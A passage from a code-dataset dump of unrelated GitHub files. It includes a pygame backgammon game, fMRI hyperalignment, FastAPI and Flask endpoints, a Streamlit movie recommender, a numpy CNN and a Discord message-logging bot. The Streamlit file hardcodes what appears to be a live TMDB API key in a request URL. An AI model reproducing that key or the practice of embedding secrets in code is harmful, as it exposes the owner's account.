Blits the dice with a given value to the screen.\n \"\"\"\n # dice_first = rotated_image = pygame.transform.rotate(dice_2, 30)\n dice_1 = pygame.image.load(\"../Images/Dice-1.png\")\n dice_2 = pygame.image.load(\"../Images/Dice-2.png\")\n dice_3 = pygame.image.load(\"../Images/Dice-3.png\")\n dice_4 = pygame.image.load(\"../Images/Dice-4.png\")\n dice_5 = pygame.image.load(\"../Images/Dice-5.png\")\n dice_6 = pygame.image.load(\"../Images/Dice-6.png\")\n dice_s = pygame.image.load(\"../Images/Dice-Shadow.png\")\n dices = [dice_s, dice_1, dice_2, dice_3, dice_4, dice_5, dice_6]\n dice_positions = [[148, 363], [227, 393], [78, 383], [297, 373]]\n # first_dice = dices[value1]\n # second_dice = dices[value2]\n # screen.blit(dice_s, (153 + value1, 368 + value2))\n # screen.blit(first_dice, (148 + value1, 363 + value2))\n # # second_dice = pygame.transform.scale(second_dice, (45, 45))\n # # dice_s = pygame.transform.scale(dice_s, (45, 45))\n # screen.blit(dice_s, (232 + value2, 398 + value1))\n # screen.blit(second_dice, (227 + value2, 393 + value1))\n all_used = False\n for i in range(0, 4):\n if dice_table[i][1] == True and dice_table[i][2] == True:\n all_used = True\n if all_used is False:\n current_dice = -1\n for i in range(3, -1, -1):\n if dice_table[i][0] != 0:\n dice_pic = dices[dice_table[i][0]]\n dice_s = pygame.image.load(\"../Images/Dice-Shadow.png\")\n dice_pic.set_alpha(255)\n dice_s.set_alpha(255)\n if i == current_dice:\n dice_pic = pygame.transform.scale(dice_pic, (70, 70))\n dice_s = pygame.transform.scale(dice_s, (70, 70))\n if dice_table[i][1] == False or dice_table[i][2] == False:\n dice_pic.set_alpha(80)\n dice_s.set_alpha(80)\n screen.blit(dice_s, (dice_positions[i][0] + dice_table[i][0] + 5, dice_positions[i][1] + dice_table[i][0] + 5))\n screen.blit(dice_pic, (dice_positions[i][0] + dice_table[i][0], dice_positions[i][1] + dice_table[i][0]))\n\n\ndef get_piece_position(row, height):\n \"\"\"\n Gets the pixel position for a given piece.\n -1 for black out pieces, -2 for white out pieces\n \"\"\"\n # piece_x = 700\n # piece_y = 40\n if row == -1:\n piece_x = 374\n piece_y = 28 + 
height * 43\n return piece_x, piece_y\n elif row == -2:\n piece_x = 374\n piece_y = 710 - height * 43\n return piece_x, piece_y\n else:\n x_positions = [700, 644, 588, 532, 476, 420, 320, 264, 208, 152, 96, 40, 40, 96, 152, 208, 264, 320, 420, 476, 532, 588, 644, 700]\n piece_x = x_positions[row]\n if row <= 11:\n piece_y = 40 + height * 52\n else:\n piece_y = 703 - height * 52\n return piece_x, piece_y\n\n\ndef clear_file():\n \"\"\"\n Clears the file with dice values\n \"\"\"\n f = open(\"../Dice.txt\", \"w\")\n f.write(\"x x\")\n f.close()\n\n\ndef play_sound(value1, value2):\n \"\"\"\n Plays certain sound effects for certain dice values. Mostly manele.\n \"\"\"\n if value1 < value2:\n value2, value1 = value1, value2\n sound_66 = pygame.mixer.Sound(\"../Sounds/Sunet-66.wav\")\n sound_66_2 = pygame.mixer.Sound(\"../Sounds/Sunet-66-2.wav\")\n sound_66_3 = pygame.mixer.Sound(\"../Sounds/Sunet-66-3.wav\")\n sound_65 = pygame.mixer.Sound(\"../Sounds/Sunet-65.wav\")\n sound_64 = pygame.mixer.Sound(\"../Sounds/Sunet-64.wav\")\n sound_44 = pygame.mixer.Sound(\"../Sounds/Sunet-44.wav\")\n # sound_42 = pygame.mixer.Sound(\"../Sounds/Sunet-42.wav\")\n # sound_41 = pygame.mixer.Sound(\"../Sounds/Sunet-41.wav\")\n sound_11 = pygame.mixer.Sound(\"../Sounds/Sunet-11.wav\")\n sound_12 = pygame.mixer.Sound(\"../Sounds/Sunet-12.wav\")\n if value1 == 6 and value2 == 6:\n rdm = random.randint(1, 3)\n if rdm == 1:\n pygame.mixer.Sound.play(sound_66)\n if rdm == 2:\n pygame.mixer.Sound.play(sound_66_2)\n if rdm == 3:\n pygame.mixer.Sound.play(sound_66_3)\n if value1 == 6 and value2 == 4:\n pygame.mixer.Sound.play(sound_64)\n if value1 == 6 and value2 == 5:\n pygame.mixer.Sound.play(sound_65)\n if value1 == 4 and value2 == 4:\n pygame.mixer.Sound.play(sound_44)\n # if value1 == 4 and value2 == 2:\n # pygame.mixer.Sound.play(sound_42)\n # if value1 == 4 and value2 == 1:\n # pygame.mixer.Sound.play(sound_41)\n if value1 == 1 and value2 == 1:\n pygame.mixer.Sound.play(sound_11)\n if value1 == 2 and value2 == 1:\n pygame.mixer.Sound.play(sound_12)\n\n\nif __name__ == '__main__':\n initialize()\n play_game()\n","repo_name":"BlackAlexander/Backgammon","sub_path":"Game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":28171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72582128564","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 28 14:15:55 2018\n\n@author: lg03\n\"\"\"\n\nimport os\nimport numpy as np\nfrom mvpa2.suite import *\nfrom nibabel import load, save\nfrom sklearn.model_selection import KFold\nimport matplotlib.pyplot as plt\nfrom scipy import stats\nimport time\n\n#load subject information\nexec(open('load_subject_info_for_statedetection.py').read())\ndatadir = '/home/lingee/wrkgrp/Cambridge_data/Movie_HMM/Data_for_Donders/'\nkfold = 5 #15\nsubin = np.nonzero(age <= 50)[0]\nIDs = CBUID[subin]\n\nstart = time.time()\nkf = KFold(n_splits=kfold, shuffle=True, random_state=1)\n\nmaskname = datadir + 'data_plus_GM_mask.nii'\n\ndef compute_ISS(run_datasets):\n subsim = np.empty((len(run_datasets), len(run_datasets)))\n for i in range(len(run_datasets)):\n for j in range(i, len(run_datasets)):\n subsim[i, j] = np.mean(np.mean(np.multiply(run_datasets[i][:,1], run_datasets[j][:,1]), 0))\n subsim[j, i] = subsim[i, j]\n refsub = np.argmax(np.mean(subsim, 0))\n return refsub\n\ncount = -1\nfor train_index, test_index in kf.split(np.arange(0, np.shape(subin)[0])):\n count = count + 1\n datasets = []\n for idx in 
test_index:\n        name = IDs[idx][0] + '_s0w_ME_denoised.nii'\n        datasets.append(name)\n\n    run_datasets = []\n    for i in datasets:\n        print(i)\n        fds = fmri_dataset(samples=datadir + i, mask=maskname)\n        fds = fds[0:192, :]\n        zscore(fds, chunks_attr=None, param_est=None)\n        run_datasets.append(fds)\n\n    refsub = compute_ISS(run_datasets)\n\n    hyper = Hyperalignment(level1_equal_weight=True)\n    slhyper = SearchlightHyperalignment(radius=3, sparse_radius=2, ref_ds=refsub, compute_recon=False, hyperalignment=hyper)\n\n    slhypmaps = slhyper(run_datasets)\n    ds_hyper = [h.forward(sd) for h, sd in zip(slhypmaps, run_datasets)]\n\n    for i in range(len(run_datasets)):\n        img = map2nifti(ds_hyper[i])\n        save(img, datadir + str(kfold) + 'group_hyperalignment/' + datasets[i][0:9] + '_hyperaligned_g' + str(count) + '.nii')\n\n    print('It took', time.time() - start, 'seconds.')\n\n","repo_name":"lgeerligs/NestedHierarchy","sub_path":"Data preparation/searchlight_hyperalignment_groups.py","file_name":"searchlight_hyperalignment_groups.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"33429984957","text":"from api import Articles\nfrom fastapi.responses import JSONResponse\nfrom fastapi import APIRouter\n\nrouter = APIRouter()\n\n\n@router.get('/mine_articles/published', description='Published articles')\ndef m_published():\n    art = Articles()\n    res = art.user_pub()\n    return JSONResponse(res)\n\n\n@router.get('/mine_articles/unpublished', description='Unpublished articles')\ndef m_unpublished():\n    art = Articles()\n    res = art.user_unpub()\n    return JSONResponse(res)\n\n\n@router.get('/all_articles/latest', description='Articles sorted by creation date')\ndef all_articles():\n    art = Articles()\n    res = art.sorted()\n    return JSONResponse(res)\n\n\n@router.get('/all_articles/by_id', description='User article by id')\ndef article_id(user_id: int):\n    art = Articles()\n    res = art.user_id(user_id)\n    return JSONResponse(res)\n\n\n@router.post('/create', description='Create an article')\ndef post_article(text: str, title: str = None, series: str = None, tags: str = None, publish: bool = None):\n    art = Articles()\n    res = art.create(text, title, series, tags, publish)\n    return JSONResponse(\"Article created successfully!\")\n\n\n@router.post('/update', description='Update an article')\ndef update_article(user_id: int, text: str, title: str = None, series: str = None, tags: str = None,\n                   publish: bool = None):\n    art = Articles()\n    res = art.update(user_id, text, title, series, tags, publish)\n    return JSONResponse(\"Article updated!\")\n","repo_name":"Dante-SSStyle/TestRequest","sub_path":"routers/article.py","file_name":"article.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42818257256","text":"import streamlit as st\nimport pickle\nimport numpy as np\nimport pandas as pd\nimport requests\n\n# fetching data about the movie from the api\ndef fetch_poster(id):\n    data=requests.get(f\"https://api.themoviedb.org/3/movie/{id}?api_key=8265bd1679663a7ea12ac168da84d2e8&language=en-US\")\n    data=data.json()\n    poster_data=\"https://image.tmdb.org/t/p/w500/\"+data['poster_path']\n    return poster_data\n\n\n\n# page configuration\nst.set_page_config(page_title=\"Recommender\",layout='wide')\nst.title('Movie Recommendation System')\n\n# getting data from pickle file\nnewdata = 
pickle.load(open('new_movie_data.pkl','rb'))\nsimilarity=pickle.load(open('similarity.pkl','rb'))\nnewdata=pd.DataFrame(newdata)\n\n# recommendation function\ndef recommend(movie):\n movie_index=newdata[newdata['title']==movie].index[0]\n similar = similarity[movie_index]\n lst=sorted(list(enumerate(similar)),reverse=True,key = lambda x:x[1])\n l=[] \n poster=[]\n for i in lst[0:11]:\n movie_names=newdata.iloc[i[0]].title\n idd=newdata.iloc[i[0]].id\n poster.append(fetch_poster(idd))\n l.append(newdata.iloc[i[0]].title)\n return l,poster\n\n\n# selection box\nselected_movie=st.selectbox(\n 'Select your movie',\n newdata['title'].values\n)\n\n\n# button \nif st.button('Recommend'):\n names, poster= recommend(selected_movie)\n x=0\n for i in range(0, 2):\n cols = st.columns(5)\n cols[0].text(names[0+x])\n cols[0].image(poster[0+x])\n cols[1].text(names[1+x])\n cols[1].image(poster[1+x])\n cols[2].text(names[2+x])\n cols[2].image(poster[2+x])\n cols[3].text(names[3+x])\n cols[3].image(poster[3+x])\n cols[4].text(names[4+x])\n cols[4].image(poster[4+x])\n x=5\n '\\n'\n\n\n ","repo_name":"akr440/Recommender-System","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"16341442535","text":"from flask import Flask\nfrom datetime import date\n\nfrom backend.RandomForestPredictor import RandomForestPredictor\nfrom backend.Stock import Stock\nfrom backend.StockLibrary import StockLibrary\nimport json\n\n# Server\nfrom backend.utils import update_database, read_database, stock_market_day\n\napp = Flask(__name__)\n\n# App\nstockLibrary = StockLibrary()\n\n\n@app.route('/predict_index', methods=['GET'])\ndef predict_index():\n curr_date = str(stock_market_day())\n result = read_database(curr_date)\n stockList = {}\n if result is None:\n stockLibrary.train()\n result = stockLibrary.createDirectionPredictions()\n update_database(json.dumps(result), curr_date)\n else:\n result = json.loads(result)\n for symbol in stockLibrary.symbolList:\n if symbol not in result:\n result[symbol] = predict_stock(symbol)\n stockList[symbol] = result[symbol]\n return json.dumps(stockList)\n\n@app.route('/predict_stock/', methods=['GET'])\ndef predict_stock(stock_symbol):\n curr_date = str(stock_market_day())\n result = json.loads(read_database(curr_date))\n\n if stock_symbol not in result:\n stock_history = Stock(stock_symbol).history\n predictor = RandomForestPredictor(stock_history)\n try:\n predictor.train()\n except:\n return {stock_symbol: -1}\n prediction = int(predictor.predict(predictor.data.iloc[-1][predictor.parameters].values.reshape(1, -1))[0])\n result[stock_symbol] = prediction\n update_database(json.dumps(result), curr_date)\n return {stock_symbol.upper(): result[stock_symbol]}\n\n@app.route('/get_all_predictions', methods=['GET'])\ndef get_all_stocks():\n curr_date = str(stock_market_day())\n return read_database(curr_date)\n\n@app.route('/get_stock_market_day', methods=['GET'])\ndef get_stock_market_day():\n return str(stock_market_day())\n\nif __name__ == \"__main__\":\n app.secret_key = '528491@JOKER'\n app.debug = True\n app.run()\n","repo_name":"sebastiaoh27/stock_predictor","sub_path":"backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"26728441898","text":"from random import randint\nfrom math import sqrt\nimport 
turtle\n\n#Рисуем рамку\nturtle.width(3)\nturtle.penup()\nturtle.goto(-300, 300)\nturtle.pendown()\nturtle.goto(-300, -300)\nturtle.goto(300, -300)\nturtle.goto(300, 300)\nturtle.goto(-300, 300)\n\n#Генерируем параметры черепашек\nnumber_of_turtles = 20\nsteps_of_time_number = 1000\ncoord = [[0] * 4 for i in range(number_of_turtles)]\ncounter = 0\n\nfor turtle_number in range(number_of_turtles):\n for i in range(2):\n coord[turtle_number][i] = randint(-280, 280)\n coord[turtle_number][i + 2] = randint(-10, 10)\n\npool = [turtle.Turtle(shape='circle') for i in range(number_of_turtles)]\nfor unit in pool:\n unit.penup()\n unit.speed(10)\n unit.goto(coord[counter][0], coord[counter][1])\n #unit.pendown()\n counter += 1\n\n\n\nfor i in range(steps_of_time_number):\n counter = 0\n for unit in pool:\n x_1 = coord[counter][0]\n y_1 = coord[counter][1]\n v_x_1 = coord[counter][2]\n v_y_1 = coord[counter][3]\n\n #Проверка на столкновение со стенкой\n if abs(x_1) >= 295:\n v_x_1 = -1 * v_x_1\n coord[counter][2] = v_x_1\n if abs(y_1) >= 295:\n v_y_1 = -1 * v_y_1\n coord[counter][3] = v_y_1\n #Проверка на столкновение с другой точкой\n for another_turtle_number in range(number_of_turtles):\n if another_turtle_number != counter:\n x_2 = coord[another_turtle_number][0]\n y_2 = coord[another_turtle_number][1]\n if sqrt((x_2 - x_1)**2 + (y_2 - y_1)**2) <= 20:\n v_x_2 = coord[another_turtle_number][2]\n v_y_2 = coord[another_turtle_number][3]\n\n #система до соударения\n p_1 = [v_x_1, v_y_1] #Вектор импульса первой точки\n p_2 = [v_x_2, v_y_2] #Вектор импульса второй точки\n p = [x_2 - x_1, y_2 - y_1]#Направляющий вектор прямой, соединяющей точки\n len_p = sqrt((x_2 - x_1)**2 + (y_2 - y_1)**2)\n s = [p[0] / len_p, p[1] / len_p] #Единичный направляющий вектор\n len_l_1 =(p_1[0] * p[0] + p_1[1] * p[1]) / len_p\n l_1 = [s[0] * len_l_1, s[1] * len_l_1] #Проекция p1 на прямую\n k_1 = [p_1[0] - l_1[0], p_1[1] - l_1[1]] #p1 - l1\n\n len_l_2 =(p_2[0] * p[0] + p_2[1] * p[1]) / len_p\n l_2 = [s[0] * len_l_2, s[1] * len_l_2] #Проекция p2 на прямую\n k_2 = [p_2[0] - l_2[0], p_2[1] - l_2[1]] #p2 - l2\n\n #Система после соударения\n p_1 = [l_2[0] + k_1[0], l_2[1] + k_1[1]]\n p_2 = [l_1[0] + k_2[0], l_1[1] + k_2[1]]\n\n v_x_1 = p_1[0]\n v_y_1 = p_1[1]\n coord[another_turtle_number][2] = p_2[0]\n coord[another_turtle_number][3] = p_2[1]\n\n unit.goto(x_1 + v_x_1, y_1 + v_y_1)\n coord[counter][0] = x_1 + v_x_1\n coord[counter][1] = y_1 + v_y_1\n coord[counter][2] = v_x_1\n coord[counter][3] = v_y_1\n counter += 1\n\n","repo_name":"SixroomSandwich/infa_2021_konyshev","sub_path":"Laba 2/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":3434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"24775380709","text":"print('задача 5')\r\n_proceeds = int(input('Введите выручку фирмы '))\r\n_cost= int(input('Введите издержки '))\r\nif _proceeds > _cost:\r\n print('компания работает с прибылью')\r\n _profitability = True\r\nelse:\r\n print('компания несёт убытки')\r\n _profitability = False\r\nprint('задача 6')\r\nif _profitability == True and _proceeds!=0:\r\n _profit = (_proceeds-_cost)/_proceeds\r\n print('показатель рентабельности составил: ', _profit)\r\n _number_of_staff = int(input('Введите численность персонала '))\r\n _profit_per_person = (_proceeds-_cost)/_number_of_staff\r\n print('выручка на одного сотрудника составляет: ', 
_profit_per_person)","repo_name":"Pachuchka/Geekbrains_python","sub_path":"Lesson_1_task_5_task_6.py","file_name":"Lesson_1_task_5_task_6.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"7324038127","text":"# EXAMPLE_PROCESS_DISTRACTORS Code to read and process 1M distractor images.\n#\n# More details about the revisited 1M distractors and evaluation can be found in:\n# Radenovic F., Iscen A., Tolias G., Avrithis Y., Chum O., Revisiting Oxford and Paris: Large-Scale Image Retrieval Benchmarking, CVPR 2018\n#\n# Authors: Radenovic F., Iscen A., Tolias G., Avrithis Y., Chum O., 2018\n\nimport os\nimport numpy as np\n\nfrom PIL import Image, ImageFile\n\nfrom dataset import configdataset\nfrom download import download_distractors\n\n#---------------------------------------------------------------------\n# Set data folder and testing parameters\n#---------------------------------------------------------------------\n\n# Set data folder, change if you have downloaded the data somewhere else\ndata_root = os.path.join(os.path.dirname(os.path.dirname(os.path.realpath(__file__))), 'data')\n# Check, and, if necessary, download distractor dataset\ndownload_distractors(data_root)\n# Set up the dataset name\ndistractors_dataset = 'revisitop1m'\n\n#---------------------------------------------------------------------\n# Read images\n#---------------------------------------------------------------------\n\ndef pil_loader(path):\n # to avoid crashing for truncated (corrupted images)\n ImageFile.LOAD_TRUNCATED_IMAGES = True\n # open path as file to avoid ResourceWarning \n # (https://github.com/python-pillow/Pillow/issues/835)\n with open(path, 'rb') as f:\n img = Image.open(f)\n return img.convert('RGB')\n\nprint('>> {}: Processing dataset...'.format(distractors_dataset)) \n# config file for the dataset\ncfg = configdataset(distractors_dataset, os.path.join(data_root, 'datasets'))\n\nfor i in np.arange(cfg['n']):\n im = pil_loader(cfg['im_fname'](cfg, i))\n ##------------------------------------------------------\n ## Perform image processing here, eg, feature extraction\n ##------------------------------------------------------\n print('>> {}: Processing image {}'.format(distractors_dataset, i+1))\n","repo_name":"filipradenovic/revisitop","sub_path":"python/example_process_distractors.py","file_name":"example_process_distractors.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","stars":223,"dataset":"github-code","pt":"76"} +{"seq_id":"1572785709","text":"import os\nfrom copy import deepcopy\n\nfrom pcluster.schemas.cluster_schema import ClusterSchema\nfrom pcluster.utils import load_yaml_dict\n\n\ndef load_cluster_model_from_yaml(config_file_name, test_datadir=None):\n if test_datadir:\n path = test_datadir / config_file_name\n else:\n # If test_datadir is not specified, find configs in example_configs directory\n path = f\"{os.path.dirname(__file__)}/example_configs/{config_file_name}\"\n input_yaml = load_yaml_dict(path)\n print(input_yaml)\n copy_input_yaml = deepcopy(input_yaml)\n cluster = ClusterSchema(cluster_name=\"clustername\").load(copy_input_yaml)\n print(cluster)\n return input_yaml, cluster\n\n\ndef get_resources(\n generated_template: dict, name: str = None, type: str = None, properties: dict = None, deletion_policy: str = None\n):\n return dict(\n (res_name, res_value)\n for res_name, res_value in generated_template.get(\"Resources\", 
{}).items()\n if (name is None or res_name == name)\n and (type is None or res_value.get(\"Type\") == type)\n and (deletion_policy is None or res_value.get(\"DeletionPolicy\") == deletion_policy)\n and (\n properties is None\n or all(\n res_value.get(\"Properties\", {}).get(prop_name) == prop_value\n for prop_name, prop_value in properties.items()\n )\n )\n )\n","repo_name":"Quentin-M/aws-parallelcluster","sub_path":"cli/tests/pcluster/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"12485841403","text":"a = float(input(\"Enter C. you want to convert: \"))\r\n\r\n\r\ndef fh():\r\n b = float(a * (9/5)+32)\r\n\r\n return b\r\n\r\n\r\nferan = fh()\r\nprint(f\"{a} C. is equal to {feran} feranhit.\")","repo_name":"Jimil-Joshi/FSDS_Python_Assignments","sub_path":"Assignment_2(2).py","file_name":"Assignment_2(2).py","file_ext":"py","file_size_in_byte":176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"69807501365","text":"import numpy as np\n\nclass CNN:\n\n def __init__(self, num_kernels, pool_size, out_nodes, seed):\n self.kernels = self.Kernels(num_kernels) # 8x8x1 to 6x6x10\n # TODO add pooling initialization\n # self.pool = self.Pool(pool_size) # 6x6x10 to 3x3x10\n # TODO change sigmoid to relu\n self.sigmoid = self.ReLu(6 * 6 * num_kernels, out_nodes) # 6x6x10 to 10\n np.random.seed(seed)\n\n class Kernels:\n # TODO possibly add bias forward and backprop to kernel outputs\n # The set of kernels and kernel functions\n\n def __init__(self, num_kernels):\n self.num_kernels = num_kernels\n self.size_kernel = 3\n self.kernels = np.random.randn(num_kernels, 3, 3) / (self.size_kernel ** 2)\n\n def forward(self, x):\n self.cur_x = x\n\n height, width = x.shape\n result = np.zeros((height - 2, width - 2, self.num_kernels))\n\n for i in range(height-2):\n for j in range(width-2):\n block = x[i:(i+3), j:(j+3)]\n result[i,j] = np.sum(block * self.kernels, axis=(1, 2))\n return result\n\n def back(self, delta_cnn, alpha):\n # TODO change size to recieve backprop from pool size\n height, width = self.cur_x.shape\n dk = np.zeros(self.kernels.shape)\n delta_cnn = delta_cnn.reshape(height-2, width-2,self.num_kernels)\n for i in range(height - 2):\n for j in range(width - 2):\n block_x = self.cur_x[i:(i+3), j:(j+3)]\n # block_delta = delta_cnn[i:(i+3), j:(j+3)]\n for k in range(self.num_kernels):\n dk[k] += delta_cnn[i,j,k] * block_x\n\n self.kernels += -alpha * dk\n\n\n class Pool:\n # use max pooling with size 2x2\n def __init__(self, pool_size):\n self.dim = pool_size # size of the pool\n\n def forward(self, x):\n self.cur_input = x\n height, width, num_k = x.shape\n result = np.zeros((height // 2, width // 2, num_k))\n for i in range(height // 2):\n for j in range(width // 2):\n block = x[(i*2):(i*2+2), (j*2):(j*2+2)]\n result[i,j] = np.amax(block, axis=(0,1))\n return result\n\n def back(self, delta_pool):\n # TODO recieve from output size\n height, width, num_k = self.cur_input.shape\n delta_pool = delta_pool.reshape((height//2, width//2, num_k))\n delta_cnn = np.zeros((height, width, num_k))\n\n for i in range(height // 2):\n for j in range(width // 2):\n block = self.cur_input[(i*2):(i*2+2),(j*2):(j*2+2)]\n b_h, b_w, b_k = block.shape\n maximum = np.amax(block, axis=(0,1))\n for s in range(b_h):\n for t in range(b_w):\n for u in range(b_k):\n if block[s, t, u] == maximum[u]:\n delta_cnn[i*2+s, j*2+t, u] = 
delta_pool[i,j,u]\n return delta_cnn\n\n\n class ReLu:\n # Use a fully connected layer using sigmoid activation\n\n def __init__(self, in_nodes, out_nodes):\n self.w = np.random.randn(out_nodes, in_nodes) / in_nodes\n self.b = np.zeros((out_nodes, 1))\n\n def f(self, z):\n return np.where(z > 0, z, 0)\n\n def d_f(self, z):\n test = np.where(z>0, 1.0, 0.0)\n return np.where(z>0, 1.0, 0.0)\n\n def loss(self, y, yhat):\n self.y_vector = np.zeros((len(yhat), 1))\n self.y_vector[y, 0] = 1.0\n loss = np.linalg.norm(self.y_vector - yhat)\n accuracy = 1 if np.argmax(yhat[:, 0]) == y else 0\n return loss, accuracy\n\n def forward(self, x):\n # TODO setup to receive pool size\n self.z_cnn = x.reshape(-1, 1)\n self.a_cnn = self.f(self.z_cnn)\n\n self.z_out = np.matmul(self.w, self.a_cnn) + self.b\n self.a_out = self.f(self.z_out)\n\n return self.a_out\n\n def back(self, alpha):\n\n w_grad = np.zeros(self.w.shape)\n b_grad = np.zeros(self.b.shape)\n\n # get delta for out layer\n delta_out = -(self.y_vector - self.a_out) * self.d_f(self.z_out)\n\n # get delta for hidden layer\n delta_pool = np.dot(self.w.T, delta_out) * self.d_f(self.z_cnn)\n\n w_grad += -alpha * np.matmul(delta_out, self.a_cnn.T)\n b_grad += -alpha * delta_out\n\n return delta_pool\n\n\n\n","repo_name":"aobject/NYU-ML-Project-resnet-dev","sub_path":"utils/cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":4700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"40486656583","text":"import discord\nfrom discord.ext import commands\nfrom datetime import datetime\n#from bot import checkIfRuleBroke\nfrom cogs.moderation import checkIfRuleBroke\n\n# Moderator Logs\nmodLogID = 827246800342745149\nmemberLogID = 827246948884283423\nuserLogID = 827246964453146665\nuserVoiceLogID = 827246989732610129\nmodVoiceLogID = 827247013472763914\nassignedRoleLogID = 827247035949514802\nmessageLogID = 827247073656045639\nsentMessageLogID = 827247088936157214\ntypingLogID = 827345082540621905\nreactionLogID = 827247050470064181\n\n# Administrator Logs\ndiscordModerationLogID = 827246814616617006\nchannelLogID = 827247195790508062\nmodRoleLogID = 827247213829685259\nrestrictMessageLogID = 827247239088177212\nrestrictSentMessageLogID = 827247263607816212\nrestrictTypingLogID = 827345162429661216\nrestrictReactionLogID = 827262769786650625\nserverLogID = 827247290329726986\notherLogID = 827247308902105150\n\n# Roles to move to restrict message log\nrestrictRoles = [558818974230511672, 558818939082375199, 826547399429193739]\n\n\nclass logs(commands.Cog):\n\n def __init__(self, client):\n self.client = client\n\n # @commands.command() Instead of @client.command()\n # @commands.Cog.listener() Instead of @client.event\n\n def checkIfRestricted(self, roles):\n for role in roles:\n for restrict in restrictRoles:\n if role.id == restrict:\n return 0\n\n # For initial creation of channel.\n # Will return array or arrays, for embed. 
Name and Value\n def getChannelPerms(self, perms):\n allPerms = ['add_reactions',\n 'administrator',\n 'attach_files',\n 'ban_members',\n 'change_nickname',\n 'connect',\n 'create_instant_invite',\n 'deafen_members',\n 'embed_links',\n 'external_emojis',\n 'kick_members',\n 'manage_channels',\n 'manage_emojis',\n 'manage_guild',\n 'manage_messages',\n 'manage_nicknames',\n 'manage_permissions',\n 'manage_roles',\n 'manage_webhooks',\n 'mention_everyone',\n 'move_members',\n 'mute_members',\n 'priority_speaker',\n 'read_message_history',\n 'read_messages',\n 'request_to_speak',\n 'send_messages',\n 'send_tts_messages',\n 'speak',\n 'stream',\n 'use_external_emojis',\n 'use_slash_commands',\n 'use_voice_activation',\n 'view_audit_log',\n 'view_channel',\n 'view_guild_insights']\n\n errors = 0\n j = 0\n nextPerm = [[None] * 2 for _ in range(len(perms))]\n for key in perms:\n i = 0\n nextPerm[j][0] = f'{key}'\n nextPerm[j][1] = \"\"\n for perm in perms[key].pair():\n for title in allPerms:\n try:\n if i == 0 and getattr(perm, title):\n nextPerm[j][1] += f':white_check_mark: {title}\\n'\n elif i == 1 and getattr(perm, title):\n nextPerm[j][1] += f':x: {title}\\n'\n except:\n errors += 1\n i += 1\n j += 1\n return nextPerm\n\n # Split between #typing-log and #restrict-typing-log\n @commands.Cog.listener()\n async def on_typing(self, channel, user, when):\n if not user.bot:\n logChannel = self.client.get_channel(typingLogID)\n result = self.checkIfRestricted(user.roles)\n if result == 0:\n logChannel = self.client.get_channel(restrictTypingLogID)\n embedVar = discord.Embed(title=f'User {user}', description=f'{user.mention} Has started typing in <#{channel.id}>.', color=2575039)\n embedVar.set_author(name=\"User typing\", icon_url=\"https://cdn.icon-icons.com/icons2/933/PNG/512/keyboard-right-arrow-button-1_icon-icons.com_72690.png\")\n embedVar.set_footer(text=f'Typing started at {when}')\n embedVar.set_thumbnail(url=f'{user.avatar_url}')\n await logChannel.send(embed=embedVar)\n\n # Split between #sent-message-log #restrict-sent-message-log\n @commands.Cog.listener()\n async def on_message(self, message):\n if not message.author.bot:\n logChannel = self.client.get_channel(sentMessageLogID)\n result = self.checkIfRestricted(message.author.roles)\n if result == 0:\n logChannel = self.client.get_channel(restrictSentMessageLogID)\n embedVar = discord.Embed(title=f'User {message.author}', description=f'{message.author.mention} Sent a message in channel <#{message.channel.id}>. 
{message.jump_url}', color=65302)\n embedVar.set_author(name=\"Message Sent\", icon_url=\"https://icon-icons.com/downloadimage.php?id=122510&root=1946/PNG/512/&file=1904660-email-envelope-letter-mail-message-post-send_122510.png\")\n embedVar.set_footer(text=f'Message sent at {message.created_at}')\n embedVar.set_thumbnail(url=f'{message.author.avatar_url}')\n embedVar.add_field(name=\"Content:\", value=f'{message.content}', inline=False)\n await logChannel.send(embed=embedVar)\n\n # Split between #message-log and #restrict-message-log\n @commands.Cog.listener()\n async def on_message_delete(self, message):\n if not message.author.bot:\n logChannel = self.client.get_channel(messageLogID)\n result = self.checkIfRestricted(message.author.roles)\n if result == 0:\n logChannel = self.client.get_channel(restrictMessageLogID)\n embedVar = discord.Embed(title=f'User {message.author}', description=f'A message sent by {message.author.mention} has been deleted in <#{message.channel.id}>.', color=16714507)\n embedVar.set_author(name=\"Message Deleted\", icon_url=\"https://cdn.icon-icons.com/icons2/10/PNG/256/remove_delete_exit_close_1545.png\")\n embedVar.set_thumbnail(url=f'{message.author.avatar_url}')\n embedVar.add_field(name=\"Content:\", value=f'{message.content}', inline=False)\n\n # Assigned who deleted the message is way too difficult\n if checkIfRuleBroke(self, message):\n embedVar.set_footer(text=f'Message sent at {message.created_at}\\nMessage deleted at {datetime.utcnow()}\\nResponsible User (guess): HackUCF Bot -- AutoMod')\n else:\n hit = 0\n async for entry in message.guild.audit_logs(action=discord.AuditLogAction.message_delete):\n try:\n if entry.target == message.author and entry.extra.channel == message.channel and (abs((datetime.utcnow() - entry.created_at)).total_seconds() / 60.0) < 5:\n embedVar.set_footer(text=f'Message sent at {message.created_at}\\nMessage deleted at 